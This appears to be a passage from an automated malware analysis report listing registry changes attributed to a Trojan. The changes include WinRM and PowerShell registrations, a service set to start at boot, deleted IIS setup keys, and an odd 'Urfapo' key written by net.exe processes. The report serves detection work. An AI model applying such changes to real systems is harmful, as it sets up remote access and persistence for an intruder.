[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"

[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"

[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"

[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"

[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathInetsrv" = "%System%\inetsrv"
"PathIISHelp" = "%WinDir%\Help\iishelp"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"

[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "9/20/2015"
"ReleaseType" = "Software Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 3B 67 3B 3C 5E 59 5A 15 F5 E8 BC 9F 0F 5C 2A"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"

[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"

[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"UpgradeType" = "0"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"

[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\.psc1]
"Content Type" = "application/PowerShell"

[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"

[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"

[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20150920"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"

[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathIISSamples" = "C:\Inetpub\iissamples"

[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"

[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"

[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"

[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"

The following service will be launched automatically at system boot:

[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]

The process net.exe:2156 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E A5 0E 3D 34 D2 AA CA 2F CD E0 2C EF A3 9D 6D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process net.exe:2224 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C BC EA EA C3 14 51 D4 AC EB 1E 69 95 B3 CE D3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process net.exe:2416 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 5B 3B BE 03 57 23 FF 69 EB F3 BB EE 66 1F AD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
